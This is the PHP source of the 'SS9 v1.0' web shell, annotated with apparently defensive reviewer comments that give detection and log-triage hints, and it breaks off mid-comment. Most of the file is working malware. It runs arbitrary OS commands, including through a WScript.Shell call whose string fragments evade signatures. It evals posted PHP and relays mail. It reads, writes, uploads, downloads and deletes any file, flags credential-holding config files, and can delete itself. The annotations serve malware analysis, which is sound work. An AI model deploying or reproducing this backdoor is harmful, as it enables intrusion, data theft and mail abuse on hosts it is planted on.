
<?

php
/*##############################################################################
#############*\
|#+----------------------------------------------------------------------------------------+#|
|*#
#*|
|*#
@@@
@@@
@@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
#*|
|*#
@@
@@
@@@ @@
#*|
|*#
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@@
@@@
@@@
#*|
|*#
#*|
|#+----------------------------------------------------------------------------------------+#|
\*##############################################################################
#############*/
/*##########################################*\
|#+----------------------------------------+#|
|#+ Script : SS9 v 1.0 (phpshell)
+#|
|#+ (C)oded By : ServeR00T
+#|
|#+ Last Modify : 04/07/2008
+#|
|#+ Email : inlove.511[at]gmail[com]
+#|
|#+----------------------------------------+#|
\*##########################################*/
// Operator-editable settings for this web shell.
// $login['use'] = 1 turns the HTTP Basic auth gate on.
// $login['use'] = 0 turns it off.
// NOTE(review): the sample ships with the gate off, so as written every action
// further down is reachable by anyone who can request this file.
$login['use'] = 0;
// Username and password are stored as unsalted md5() hex digests.
// Per the author's note, the default digest '8bf0abc0c4d5c9abb79cd816e4a545bd' is md5 of 'ss9',
// used for both fields. The constant is a convenient static indicator when
// scanning a web root for this sample.
$login['user'] = "8bf0abc0c4d5c9abb79cd816e4a545bd"; // username
$login['pass'] = "8bf0abc0c4d5c9abb79cd816e4a545bd"; // password
############### MySQL Settings ###############
// Placeholder database credentials. They are not referenced anywhere in the
// visible part of the file; presumably the SQL-based actions defined later
// read them (TODO confirm against the rest of the script).
$mysql['host'] = "localhost";
$mysql['user'] = "username";
$mysql['pass'] = "password";
$mysql['db'] = "database";
##############################################
############### Security Shell ###############
// Optional HTTP Basic auth gate; only evaluated when $login['use'] is 1.
// The client-supplied user name and password are md5()-hashed and compared
// with the stored digests using the loose `!=` operator. On any mismatch (or
// when no credentials were sent) the script answers 401 and stops.
// For triage: requests carrying an Authorization: Basic header to a PHP file
// that has no business asking for one are worth a look in the access log.
if ($login['use'] == 1)
{
if (!isset($_SERVER['PHP_AUTH_USER']) or md5($_SERVER['PHP_AUTH_
USER']) != $login['user'] or md5($_SERVER['PHP_AUTH_PW']) != $login['pass'])

{
// Challenge the browser, then emit a plain HTML refusal and terminate.
header('WWW-Authenticate: Basic realm="This File is Secu
red :>"');
header('HTTP/1.0 401 Unauthorized');
exit("<br><br><br><br><p align='center'><font face='Taho
ma' size='2'><b>You Don't Have Access To Read This File.</b></font></p>");
}
}
// Request bootstrap: buffer output and set the error-reporting mask.
ob_start();
// 7 = E_ERROR | E_WARNING | E_PARSE; notices are hidden.
error_reporting(7);
// When register_globals is not on, emulate it: every POST and GET parameter
// becomes a variable in the current scope (EXTR_SKIP keeps variables that
// already exist). This is why later code reads names such as $execfunc that
// are never assigned in the script itself. fetch_env() is defined outside
// this part of the file.
if (fetch_env('register_globals') != 1)
{
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
// Undo magic-quotes escaping on request data. get_magic_quotes_gpc() no longer
// exists in PHP 8, which dates the script; stripslashes_array() is defined
// outside this part of the file.
if (get_magic_quotes_gpc())
{
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
############### Set Variables ################
// Working directory of the PHP process; used as the default search directory
// and as the parent for newly created directories.
$pwd
= getcwd();
// Value of the disable_functions setting as returned by fetch_env() (helper
// defined outside this part of the file).
$dis_func
= fetch_env("disable_functions");
$safe_mode
= fetch_env('safe_mode');
// HTML label describing the safe_mode state, built for display to the operator.
$safemode
= ($safe_mode == "on" or strtolower($safe_mode) == "on") ?
'<font color="red">ON (Secured)</font>' : '<font color="green">OFF (Not Secured
)</font>';
// File names the file manager checks with in_array() and renders highlighted.
// The names are typical of application configuration and database connection
// files, i.e. likely credential stores on the host.
$danger_files = array("config.php", "config.inc.php", "connect.php", "my
sql.php", "connectmysql.php", "info.php", "info.inc.php");
// HTML form/table builder; the FORMS class is defined outside this part of the file.
$tb
= new FORMS;
################ Delete Self #################
// ?act=delete removes the shell's own file from disk; `@` hides any failure and
// there is no exit, so execution continues with the checks below.
// For incident response: the file may be gone by the time of analysis, but the
// request that triggered the deletion is still recorded in the web access log.
if ($_GET['act'] == "delete")
{
@unlink(__FILE__);
}
################### About ####################
if ($_GET['act'] == "about")
{
doheader();
msg('<div align="left" style="font-size: 13px"><font face="lucid
a console"><br>
/*##############################################################################
#############*\
|#+----------------------------------------------------------------------------------------#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&

nbsp;&nbsp;&nbsp;@@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;@@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@@&n
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;@@@&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@
@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;@@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;@@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@@&n
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;#*|
|*#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb

sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#----------------------------------------------------------------------------------------#*|
|*##############################################################################
#############*|
|*#----------------------------------------------------------------------------------------#*|
|*#&nbsp;Script&nbsp;:&nbsp;SS9&nbsp;v&nbsp;1.0&nbsp;(phpshell)&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;(C)oded&nbsp;By&nbsp;:&nbsp;ServeR00T&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;Last&nbsp;Modify&nbsp;:&nbsp;03/07/2008&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#&nbsp;Email&nbsp;:&nbsp;inlove.511[at]gmail[com]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*|
|*#----------------------------------------------------------------------------------------+*|
\*##############################################################################
#############*/&nbsp;
</font></div>');
dofooter();
exit;
}
################## PHPinfo ###################
// ?act=phpinfo prints the full phpinfo() report unless "phpinfo" appears in the
// disable_functions value read earlier into $dis_func. The report exposes the
// interpreter configuration, loaded modules, paths and environment to whoever
// requests it. eregi() was removed in PHP 7, another sign of the script's age.
if ($_GET['act'] == "phpinfo")
{
echo $phpinfo = (!eregi("phpinfo",$dis_func)) ? phpinfo() : "<ce
nter>phpinfo()</center>";
exit;
}
################## Command ###################
// ?act=cmd: operating-system command execution. The POST field 'command' is
// passed unmodified to whichever PHP execution primitive $execfunc names.
// $execfunc is never assigned in the script; it exists only because the
// bootstrap extract()s request parameters into variables.
// For defenders: the observable effect is the web server account spawning
// shell or cmd.exe child processes. Listing these functions in
// disable_functions removes the primitives used here.
if ($_GET['act'] == "cmd")
{
doheader();
if (substr(PHP_OS, 0, 3) == 'WIN')
{
// Windows-only defaults. $program and $prog are assigned here but not used
// again in this branch; $pathname is not assigned before this point in the
// visible code.
$program = isset($_POST['program']) ? $_POST['program']
: $_SERVER['COMSPEC'];
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net

start > " . $pathname . "/log.txt";


}
// Options offered in the drop-down; the 'wscript' entry is added on Windows only.
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'
system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'
=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'pa
ssthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
// Render the command form; html_cmd() and the FORMS methods are defined
// outside this part of the file.
$content = $tb->headerform2(array('content'=>'&nbsp;&nbsp;' .
$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execf
unc)) . ' ' . $tb->makeinput('command') . ' ' . $tb->makeinput('Run','command','
','submit')));
html_cmd($content);
if (isset($_POST['command']))
{
// Dispatch on the selected primitive. No validation, quoting or allow-list
// is applied to the command string in any branch.
if ($execfunc == "system")
{
system($_POST['command']);
}
elseif ($execfunc == "passthru")
{
passthru($_POST['command']);
}
elseif ($execfunc == "exec")
{
// exec() returns only the last line of the command's output.
$result = exec($_POST['command']);
echo $result;
}
elseif ($execfunc == "shell_exec")
{
$result = shell_exec($_POST['command']);
echo $result;
}
elseif ($execfunc == "popen")
{
// A single fread() call: at most 2096 bytes of output are shown.
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
}
elseif ($execfunc == "wscript")
{
// Windows COM route. The class name and the "cmd.exe" string are assembled
// from fragments, so the contiguous literals never appear in the file;
// plain string signatures for them will miss this sample, while the
// fragment pattern itself is distinctive.
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or d
ie("PHP Create COM WSHSHELL Failed");
$exec = $wsh->exec("cm"."d.e"."xe /c " . $_POST[
'command']);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
}
else
{
// Any other (or missing) selector falls back to system().
system($_POST['command']);
}
}
// Closes the <textarea> and tables; the opening markup is presumably emitted
// by html_cmd() (not visible here).
print("</textarea></td>
</tr>
</table>

</td>
</tr>
</table>");
dofooter();
exit;
}
#################### Eval ####################
// ?act=eval: arbitrary PHP execution. When the POST field 'code' is present it
// is handed to eval() unchanged and the script exits; otherwise the input
// form is rendered.
// For defenders: eval() is a language construct, so disable_functions does not
// affect it; detection has to rely on file-integrity monitoring, static
// matching of eval() applied to request data, or request-body inspection.
if ($_GET['act'] == 'eval')
{
if (isset($_POST['code']))
{
eval($_POST['code']);
exit;
}
// No code submitted: show the form. $REQUEST_URI is not assigned in the
// visible code and is written into the page unescaped.
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Eval :</b></td></tr></table>
</td>
</tr>
<form action="' . $REQUEST_URI . '?act=eval" method="POST">
<tr class="secondalt">
<td align="center">
<textarea name="code" cols="90" rows="20">Code Here</tex
tarea><br>
<input type="submit" class="input" name="submit" value="
eval code">
</td>
</tr>
</table>');
dofooter();
exit;
}
################## Send Mail #################
// ?act=mail: sends e-mail through the host's mail() configuration using
// recipient, subject, body and From header taken straight from the POST data.
// A compromised host running this can therefore be used as a mail relay.
// Unexpected outbound mail volume from the web server account, or bounces for
// messages nobody on the site sent, are the usual symptoms.
if ($_GET['act'] == 'mail')
{
doheader();
if ($_GET['do'] == 'send')
{
// The From value is concatenated into the additional-headers argument
// without any filtering; `@` hides mail() warnings.
$send = @mail($_POST['to'],$_POST['subject'],$_POST['msg
'],"From: ".$_POST['from']."\r\n");
// msg() and the helper called as goto() are defined outside this part of
// the file. NOTE(review): `goto` has been a reserved word since PHP 5.3, so
// a helper with this name only parses on older interpreters.
if ($send)
{
msg('Successfully send message.');
goto($REQUEST_URI . '?');
}
else
{
msg('Sorry, Can\'t send message.');
goto($REQUEST_URI . '?');

}
dofooter();
exit;
}
// No send requested: render the compose form.
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Send Mail :</b></td></tr></table>
</td>
</tr>
<form action="' . $REQUEST_URI . '?act=mail&do=send" method="POST">
<tr class="secondalt">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0">
<tr>
<td><b>From :</b></td>
</tr>
<tr>
<td><input type="text" class="input" name="from"
size="40" value="you@isp.com"></td>
</tr>
<tr>
<td><b>To :</b></td>
</tr>
<tr>
<td><input type="text" class="input" name="to" s
ize="40" value="he@isp.com"></td>
</tr>
<tr>
<td><b>Subject :</b></td>
</tr>
<tr>
<td><input type="text" class="input" name="subje
ct" size="40"></td>
</tr>
<tr>
<td><b>Message :</b></td>
</tr>
<tr>
<td><textarea name="msg" cols="90" rows="20"></t
extarea></td>
</tr>
<tr>
<td align="center"><input type="submit" class="i
nput" name="submit" value=" Send "></td>
</tr>
</table>
</td>
</tr>
</table>');
dofooter();
exit;
}

################# Edit File ##################


// ?act=editfile: reads a file chosen by the requester (POST 'editfile' or GET
// 'file') and shows it in an edit form that posts to ?act=savefile. There is
// no restriction on the path, so anything readable by the web server account
// can be displayed.
if ($_GET['act'] == 'editfile')
{
doheader();
if (isset($_POST['editfile']))
{
$filename = $_POST['editfile'];
$fp = fopen($_POST['editfile'], "r");
$file = file($_POST['editfile']);
}
elseif (isset($_GET['file']))
{
$filename = $_GET['file'];
$fp = fopen($_GET['file'], "r");
$file = file($_GET['file']);
}
// If neither parameter was sent, $file and $fp are undefined here and below.
// $content is appended to without being initialised in this block.
foreach ($file as $string)
{
$content .= $string;
}
// The file body is passed through htmlentities(), but $filename is written
// into the heading and the hidden field unescaped.
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Edit file: ' . $filename . '</b></td></tr></table>
</td>
</tr>
<form action="' . $REQUEST_URI . '?act=savefile" method="POST">
<tr class="secondalt">
<td align="center">
<textarea name="content" cols="90" rows="20">' . htmlent
ities($content) . '</textarea>
<input type="hidden" name="savefile" value="' . $filenam
e . '"><br>
<input type="submit" class="input" name="submit" value="
Save">
</td>
</tr>
</table>');
fclose($fp);
dofooter();
exit;
}
################# Save File ##################
// ?act=savefile: writes the POST field 'content' to the path named in the POST
// field 'savefile', truncating or creating the file ("w" mode). The path is
// not restricted, so any location writable by the web server account can be
// overwritten, including application source files. File-integrity monitoring
// on the web root is the relevant control.
if ($_GET['act'] == 'savefile')
{
doheader();
// The fopen() result is not checked before fwrite()/fclose().
$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($_POST['content']);
fwrite($fp, $content);
fclose($fp);
msg('Successfully saved!');
goto($REQUEST_URI . '?');
dofooter();

exit;
}
############### Delete File ##################
// ?act=delfile: deletes the file at GET 'pwd' + "/" + GET 'file'. Both parts
// come from the request, so the target is any file the web server account may
// remove. `@` hides the warning on failure; the two branches differ only in
// the message shown.
if ($_GET['act'] == 'delfile')
{
doheader();
if (@unlink($_GET['pwd'] . "/" . $_GET['file']))
{
msg('Successfully deleted!');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
else
{
msg('Sorry,don\'t deleted!');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
}
################ Download File ###############
// ?act=download: returns the file named in POST 'downname' to the requester as
// an attachment. The path is unrestricted, which makes this the bulk data-
// exfiltration path of the shell; unusually large responses from a single PHP
// file are the log-side trace.
if ($_GET['act'] == "download")
{
doheader();
$fp = fopen($_POST['downname'],"r");
if (!$fp)
{
// Open failed: report it. There is no exit in this branch.
msg('Sorry, Can\'t open this file.');
goto($REQUEST_URI . '?');
dofooter();
}
else
{
// Drop the page header already buffered by doheader() so that only the file
// bytes are sent.
ob_clean();
$filename = basename($_POST['downname']);
// The whole file is read into memory in one call.
$filedump = fread($fp,filesize($_POST['downname']));
fclose($fp);
$content_encoding = $mime_type = '';
// compress() is defined outside this part of the file; presumably it sets
// $content_encoding/$mime_type and may rewrite $filename/$filedump according
// to POST 'compress' (TODO confirm).
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding))
{
header('Content-Encoding: ' . $content_encoding)
;
}
header("Content-type: " . $mime_type);
header('Content-disposition: attachment; filename="' . $
filename . '";');
print($filedump);
dofooter();
exit;
}
}
################ Upload File #################
// ?act=upload: stores an uploaded file under POST 'uploaddir' using the
// client-supplied file name. Neither the directory nor the name is validated,
// and copy() is used instead of move_uploaded_file(). This is how further
// tooling gets placed on the host; new files owned by the web server account
// appearing in the web root are the indicator to watch for.
if ($_GET['act'] == 'upload')
{
doheader();

if (@copy($_FILES['uploadfile']['tmp_name'],$_POST['uploaddir']
. "/" . $_FILES['uploadfile']['name']))
{
msg('Done Upload File.');
goto($REQUEST_URI . "?");
}
else
{
msg('Sorry, Don\'t Upload File.');
goto($REQUEST_URI . "?");
}
dofooter();
exit;
}
################ Rename File #################
// ?act=rename: renames (or moves) POST 'oldname' to POST 'newname'. Both paths
// are taken from the request without restriction.
if ($_GET['act'] == 'rename')
{
doheader();
if (rename($_POST['oldname'],$_POST['newname']))
{
msg('Done Rename File.');
goto($REQUEST_URI . "?");
}
else
{
msg('Sorry, Don\'t Rename File.');
goto($REQUEST_URI . "?");
}
dofooter();
exit;
}
################## Search ####################
// ?act=search: searches files under a requester-chosen directory for a text
// string and lists the matches. With do=search the query runs; otherwise the
// search form is shown. The SearchResult class and css() are defined outside
